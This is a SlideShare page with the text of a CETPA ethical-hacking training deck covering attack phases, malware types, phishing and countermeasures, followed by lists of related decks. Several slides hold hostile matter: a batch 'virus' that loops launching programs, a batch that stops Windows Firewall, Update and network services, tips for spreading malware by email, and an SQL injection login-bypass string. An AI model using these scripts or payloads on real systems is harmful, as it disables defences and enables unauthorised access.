SlideShare una empresa de Scribd logo

Ethical hacking

Descargar como PPTX, PDF
Roorkee Cetpa
Roorkee Cetpa
1 de 43
CETPA Ethical Hacking Training Cetpa Infotcch Pvt. Ltd
Why Security Needed ?  Dependence on information systems and services means organizations are more vulnerable to security threats. The interconnecting of public and private networks and sharing of information resources increases the difficulty of achieving access control. The trend for distributed computing has weakened the effectiveness of central, specialist control.  The purpose of information security management is to ensure business continuity and reduce business damage by preventing and minimizing the impact of security incidents.  Maintaining integrity availability and confidentiality. Cetpa Infotcch Pvt. Ltd
Ethical Hacker vs Hacker  An ethical hacker attempts to bypass way past the system security and search for any weak points that could be exploited by malicious hackers. This information is then used by the organization to improve the system security, in an effort to minimize or eliminate, any potential attacks.  In computer networking,hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Types of Hackers Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
World famous hackers StephenWozniac Tsutomu Shimomura Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
KeMitnickvin Kevin Poulsen Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Defining the Skills Required to Become an Ethical Hacker  Ethical hackers who stay a step ahead of malicious hackers must be computer systems experts who are very knowledgeable about computer programming, networking and operating systems. In-depth knowledge about highly targeted platforms (such as Windows, Unix, and Linux) is also a requirement. Patience, persistence, and immense perseverance are important qualities that many hackers possess because of the length of time and level of concentration required for most attacks/compromises to pay off. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Security consists of four basic elements  Confidentiality   Authenticity   Integrity   Availability Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Setting up Ethical hacking Lab  Linux Virtual machine  Windows Virtual machine  VPN  Proxy Server  VPS  High Speed Internet  Address Spoofing macchanger -m b2:aa:0e:56:ed:f7 eth0 Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Understanding the Victim Better Cetpa Infotcch Pvt. Ltd •Who did we break in as ? • Is the current user actively working ? •Are we running in a VM ? Environment details ? •What process are running ? AV •Network topology ? •Program must frequently run ? •Enumerating details – users, groups , registry etc. Cetpa Infotcch Pvt. Ltd
Modes of Attack  Local  Remote  Social Engineering Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
PHASES OF A ETHICAL HACKING Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Reconnaissance Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Scanning Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Exploitation Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Maintaining Access Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
System Hacking (local)  Admin Password Breaking  Steganography  Virus and Trojans  Batch Virus  Key logger Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Steganography Hiding Technique  Steganography : is the art or practice of concealing a message, image, or file within another message, image, or file.  Image steganography by dos command  Audio steganography. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Types of Malicious Software  1. Virus  2. Worm  3. Trojan & backdoors  4. Root Kit  5. Spyware Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Demo Batch Virus  @echo off :loop start notepad start compmgmt.msc start mspaint start osk start cmd start explorer start control start calc goto loop  open notepad & type @echo off net stop "Windows Firewall" net stop "Windows Update" net stop Workstation net stop "DHCP Client" net stop "DNS Client" net stop "Print Spooler" net stop Themes exit Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
What Is Meant by “Wrapping”? Hiding Technique  Wrappers are software packages that can be used to deliver a Trojan. The wrapper binds alegitimate file to the Trojan file. Both the legitimate software and the Trojan are combined intoa single executable file and installed when the program is run.  Batch virus Wrapping Demo. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
How to Spread Virus:  Send email after:  1. File Binding.  2. Hide exe into excel file.  3. Office 2003 Macro bypasser:  4. File name phising  5. False Linking. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
System Hacking Countermeasure  NTFS Permissions  Password Policy  Audit Policy  Group Policy  USB Key login  Syskey Security Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Password Policy & Auditing  Changing password policy command: secpol.msc.  Audit logon events through auditing. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Email Hacking  Forging / Spamming  Tracing emails  Keylogger  Phishing  Tabnabbing  Email collector auxiliary/gather/search_email_collector Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Phishing  Phishing is the method used to steal personal information through spamming or other deceptive means. There are a number of different phishing techniques used to obtain personal information from users. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Protection against phishing  Don't click  Go direct  Don't try to "win" anything  Don't panic  Get security Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Types of key loggers?  1. Software-based keyloggers Software-based keyloggers are essentially programs that aim to monitor your computer’s operating system. They vary in types and levels of system penetration. One example of which is memory injection software. These are typical Trojan viruses that alter the memory tablet of a system in order to bypass online security.  2. Hardware-based keyloggers Compared to a software-based, hardware ones don’t need any installing since they are already within the physical system of the computer.Keyboard keyloggers are one of the most common examples of hardware-based ones. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
TABNABBING: A NEW TYPE OF PHISHING ATTACK  Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers.  Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Tracing emails  Email tracking is a method for monitoring the email delivery to intended recipient. Most tracking technologies use some form of digitally time-stamped record to reveal the exact time and date that an email was received or opened, as well the IP address of the recipient.  Email Tracing Demo ………………… Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. L
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. L
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt.
Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Lt
Admin login page password injection  Search adminlogin.aspx  Try some default password  Like admin 1’or’1’=‘1 etc… Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
CETPA Roorkee #200, Purvawali, 2nd Floor (Opp. Railway Ticket Agency) Railway Road, Ganeshpur, Roorkee - 247667 Contact Us: +91-9219602769, 01332-270218 Fax - 1332 - 274960CETPA Noida D-58, Sector-2, Red FM Lane, Noida -201301, Uttar Pradesh Contact Us: 0120- 3839555, +91-9212172602 CETPA Lucknow #401 A, 4th Floor, Lekhraj Khazana, Faizabad Road , Indira Nagar, Lucknow - 226016 Uttar Pradesh Contact: +91-9258017974, 0522-6590802 CETPA Dehradun 105, Mohit Vihar, Near Kamla Palace, GMS Road, Dehradun-248001,UK Contact: +91-9219602771, 0135- 6006070
Cetpa Infotcch Pvt. Ltd

Recomendados

Ethical hacking
Ethical hackingEthical hacking
Ethical hackingRoorkee Cetpa
 
Learn Hacking With Gflixacademy
Learn Hacking With GflixacademyLearn Hacking With Gflixacademy
Learn Hacking With GflixacademyGaurav Mishra
 
Network and web security
Network and web securityNetwork and web security
Network and web securityNitesh Saitwal
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSavvius, Inc
 
Information Security Fundamentals - New Horizons Bulgaria
Information Security Fundamentals - New Horizons BulgariaInformation Security Fundamentals - New Horizons Bulgaria
Information Security Fundamentals - New Horizons BulgariaNew Horizons Bulgaria
 
Network Security
Network SecurityNetwork Security
Network SecurityVIKAS SINGH BHADOURIA
 
Types of Attack in Information and Network Security
Types of Attack in Information and Network SecurityTypes of Attack in Information and Network Security
Types of Attack in Information and Network Securitypadmeshagrekar
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNorth Texas Chapter of the ISSA
 

Recomendados

Ethical hacking
Ethical hackingEthical hacking
Ethical hackingRoorkee Cetpa
 
Learn Hacking With Gflixacademy
Learn Hacking With GflixacademyLearn Hacking With Gflixacademy
Learn Hacking With GflixacademyGaurav Mishra
 
Network and web security
Network and web securityNetwork and web security
Network and web securityNitesh Saitwal
 
Security Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSecurity Attack Analysis for Finding and Stopping Network Attacks
Security Attack Analysis for Finding and Stopping Network AttacksSavvius, Inc
 
Information Security Fundamentals - New Horizons Bulgaria
Information Security Fundamentals - New Horizons BulgariaInformation Security Fundamentals - New Horizons Bulgaria
Information Security Fundamentals - New Horizons BulgariaNew Horizons Bulgaria
 
Network Security
Network SecurityNetwork Security
Network SecurityVIKAS SINGH BHADOURIA
 
Types of Attack in Information and Network Security
Types of Attack in Information and Network SecurityTypes of Attack in Information and Network Security
Types of Attack in Information and Network Securitypadmeshagrekar
 
NTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNTXISSACSC4 - Security for a New World
NTXISSACSC4 - Security for a New WorldNorth Texas Chapter of the ISSA
 
Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasureskaranwayne
 
Practical Network Security
Practical Network SecurityPractical Network Security
Practical Network SecuritySudarsun Santhiappan
 
Sophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecuritySophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecurityPriyanka Aash
 
Introduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivismIntroduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivismGlobal Micro Solutions
 
Combating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringCombating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringLancope, Inc.
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network securityAPNIC
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 
Cyber security for journalists
Cyber security for journalistsCyber security for journalists
Cyber security for journalistsShanmugavel Sankaran
 
Honeypots
HoneypotsHoneypots
HoneypotsJayant Gandhi
 
Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)Yuval Sinay, CISSP, C|CISO
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???trendy updates
 
Cyber Security-Ethical Hacking
Cyber Security-Ethical HackingCyber Security-Ethical Hacking
Cyber Security-Ethical HackingViral Parmar
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Honeypots
HoneypotsHoneypots
HoneypotsRushikesh Kulkarni
 
Honeypot Presentation - Using Honeyd
Honeypot Presentation - Using HoneydHoneypot Presentation - Using Honeyd
Honeypot Presentation - Using Honeydicanhasfay
 
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Vasile
 
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?festival ICT 2016
 
All about Honeypots & Honeynets
All about Honeypots & HoneynetsAll about Honeypots & Honeynets
All about Honeypots & HoneynetsMehdi Poustchi Amin
 
Anonymizers
AnonymizersAnonymizers
AnonymizersGregory Hanis
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and PatchingEmmanuel Udeagha B.
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingANURAG CHAKRABORTY
 

Más contenido relacionado

La actualidad más candente

Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasureskaranwayne
 
Sophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecuritySophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecurityPriyanka Aash
 
Introduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivismIntroduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivismGlobal Micro Solutions
 
Combating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringCombating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringLancope, Inc.
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network securityAPNIC
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 
Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)Yuval Sinay, CISSP, C|CISO
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???trendy updates
 
Cyber Security-Ethical Hacking
Cyber Security-Ethical HackingCyber Security-Ethical Hacking
Cyber Security-Ethical HackingViral Parmar
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 
Honeypot Presentation - Using Honeyd
Honeypot Presentation - Using HoneydHoneypot Presentation - Using Honeyd
Honeypot Presentation - Using Honeydicanhasfay
 
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Vasile
 
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?festival ICT 2016
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and PatchingEmmanuel Udeagha B.
 

La actualidad más candente (20)

Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasures
 
Practical Network Security
Practical Network SecurityPractical Network Security
Practical Network Security
 
Sophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecuritySophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent Security
 
Introduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivismIntroduction to the advanced persistent threat and hactivism
Introduction to the advanced persistent threat and hactivism
 
Combating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringCombating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security Monitoring
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network security
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
Cyber security for journalists
Cyber security for journalistsCyber security for journalists
Cyber security for journalists
 
Honeypots
HoneypotsHoneypots
Honeypots
 
Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)Common Techniques To Identify Advanced Persistent Threat (APT)
Common Techniques To Identify Advanced Persistent Threat (APT)
 
Network Security R U Secure???
Network Security R U Secure???Network Security R U Secure???
Network Security R U Secure???
 
Cyber Security-Ethical Hacking
Cyber Security-Ethical HackingCyber Security-Ethical Hacking
Cyber Security-Ethical Hacking
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Honeypots
HoneypotsHoneypots
Honeypots
 
Honeypot Presentation - Using Honeyd
Honeypot Presentation - Using HoneydHoneypot Presentation - Using Honeyd
Honeypot Presentation - Using Honeyd
 
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
 
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
Advanced Persistent Threat: come muoversi tra il marketing e la realtà?
 
All about Honeypots & Honeynets
All about Honeypots & HoneynetsAll about Honeypots & Honeynets
All about Honeypots & Honeynets
 
Anonymizers
AnonymizersAnonymizers
Anonymizers
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and Patching
 

Similar a Ethical hacking

Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingANURAG CHAKRABORTY
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfxererenhosdominaram
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and youArt Ocain
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introductionjagadeesh katla
 
Ch # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsCh # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsMuhammadRobeel3
 
Computer security and_privacy_2010-2011
Computer security and_privacy_2010-2011Computer security and_privacy_2010-2011
Computer security and_privacy_2010-2011lbcollins18
 
Ethical hacking and cyber security intro
Ethical hacking and cyber security introEthical hacking and cyber security intro
Ethical hacking and cyber security introAbhilash Ak
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHackingAve Nawsh
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingRaghav Bisht
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hackingWaseem Rauf
 
Security in the enterprise - Why You Need It
Security in the enterprise - Why You Need ItSecurity in the enterprise - Why You Need It
Security in the enterprise - Why You Need ItSlick Cyber Systems
 

Similar a Ethical hacking (20)

Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Ethical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration Testing
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and you
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introduction
 
Ch # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guardsCh # 10 computer security risks and safe guards
Ch # 10 computer security risks and safe guards
 
Computer security and_privacy_2010-2011
Computer security and_privacy_2010-2011Computer security and_privacy_2010-2011
Computer security and_privacy_2010-2011
 
Ethical hacking and cyber security intro
Ethical hacking and cyber security introEthical hacking and cyber security intro
Ethical hacking and cyber security intro
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Web Security
Web SecurityWeb Security
Web Security
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hacking
 
OS Fingerprinting
OS FingerprintingOS Fingerprinting
OS Fingerprinting
 
Security in the enterprise - Why You Need It
Security in the enterprise - Why You Need ItSecurity in the enterprise - Why You Need It
Security in the enterprise - Why You Need It
 

Ethical hacking

  • 2. Why Security Needed ?  Dependence on information systems and services means organizations are more vulnerable to security threats. The interconnecting of public and private networks and sharing of information resources increases the difficulty of achieving access control. The trend for distributed computing has weakened the effectiveness of central, specialist control.  The purpose of information security management is to ensure business continuity and reduce business damage by preventing and minimizing the impact of security incidents.  Maintaining integrity availability and confidentiality. Cetpa Infotcch Pvt. Ltd
  • 3. Ethical Hacker vs Hacker  An ethical hacker attempts to bypass way past the system security and search for any weak points that could be exploited by malicious hackers. This information is then used by the organization to improve the system security, in an effort to minimize or eliminate, any potential attacks.  In computer networking,hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 4. Types of Hackers Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 5. World famous hackers StephenWozniac Tsutomu Shimomura Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 6. KeMitnickvin Kevin Poulsen Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 7. Defining the Skills Required to Become an Ethical Hacker  Ethical hackers who stay a step ahead of malicious hackers must be computer systems experts who are very knowledgeable about computer programming, networking and operating systems. In-depth knowledge about highly targeted platforms (such as Windows, Unix, and Linux) is also a requirement. Patience, persistence, and immense perseverance are important qualities that many hackers possess because of the length of time and level of concentration required for most attacks/compromises to pay off. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 8. Security consists of four basic elements  Confidentiality   Authenticity   Integrity   Availability Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 9. Setting up Ethical hacking Lab  Linux Virtual machine  Windows Virtual machine  VPN  Proxy Server  VPS  High Speed Internet  Address Spoofing macchanger -m b2:aa:0e:56:ed:f7 eth0 Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 10. Understanding the Victim Better Cetpa Infotcch Pvt. Ltd •Who did we break in as ? • Is the current user actively working ? •Are we running in a VM ? Environment details ? •What process are running ? AV •Network topology ? •Program must frequently run ? •Enumerating details – users, groups , registry etc. Cetpa Infotcch Pvt. Ltd
  • 11. Modes of Attack  Local  Remote  Social Engineering Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 12. PHASES OF A ETHICAL HACKING Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 13. Reconnaissance Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 14. Scanning Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 15. Exploitation Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 16. Maintaining Access Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 17. System Hacking (local)  Admin Password Breaking  Steganography  Virus and Trojans  Batch Virus  Key logger Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 18. Steganography Hiding Technique  Steganography : is the art or practice of concealing a message, image, or file within another message, image, or file.  Image steganography by dos command  Audio steganography. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 19. Types of Malicious Software  1. Virus  2. Worm  3. Trojan & backdoors  4. Root Kit  5. Spyware Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 20. Demo Batch Virus  @echo off :loop start notepad start compmgmt.msc start mspaint start osk start cmd start explorer start control start calc goto loop  open notepad & type @echo off net stop "Windows Firewall" net stop "Windows Update" net stop Workstation net stop "DHCP Client" net stop "DNS Client" net stop "Print Spooler" net stop Themes exit Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 21. What Is Meant by “Wrapping”? Hiding Technique  Wrappers are software packages that can be used to deliver a Trojan. The wrapper binds alegitimate file to the Trojan file. Both the legitimate software and the Trojan are combined intoa single executable file and installed when the program is run.  Batch virus Wrapping Demo. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 22. How to Spread Virus:  Send email after:  1. File Binding.  2. Hide exe into excel file.  3. Office 2003 Macro bypasser:  4. File name phising  5. False Linking. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 23. System Hacking Countermeasure  NTFS Permissions  Password Policy  Audit Policy  Group Policy  USB Key login  Syskey Security Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 24. Password Policy & Auditing  Changing password policy command: secpol.msc.  Audit logon events through auditing. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 25. Email Hacking  Forging / Spamming  Tracing emails  Keylogger  Phishing  Tabnabbing  Email collector auxiliary/gather/search_email_collector Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 26. Phishing  Phishing is the method used to steal personal information through spamming or other deceptive means. There are a number of different phishing techniques used to obtain personal information from users. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 27. Protection against phishing  Don't click  Go direct  Don't try to "win" anything  Don't panic  Get security Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 28. Types of key loggers?  1. Software-based keyloggers Software-based keyloggers are essentially programs that aim to monitor your computer’s operating system. They vary in types and levels of system penetration. One example of which is memory injection software. These are typical Trojan viruses that alter the memory tablet of a system in order to bypass online security.  2. Hardware-based keyloggers Compared to a software-based, hardware ones don’t need any installing since they are already within the physical system of the computer.Keyboard keyloggers are one of the most common examples of hardware-based ones. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 29. TABNABBING: A NEW TYPE OF PHISHING ATTACK  Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers.  Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 30. Tracing emails  Email tracking is a method for monitoring the email delivery to intended recipient. Most tracking technologies use some form of digitally time-stamped record to reveal the exact time and date that an email was received or opened, as well the IP address of the recipient.  Email Tracing Demo ………………… Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 31. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 33. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 34. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. L
  • 35. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. L
  • 36. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt.
  • 38. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
  • 39. Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Lt
  • 40. Admin login page password injection  Search adminlogin.aspx  Try some default password  Like admin 1’or’1’=‘1 etc… Cetpa Infotcch Pvt. Ltd Cetpa Infotcch Pvt. Ltd
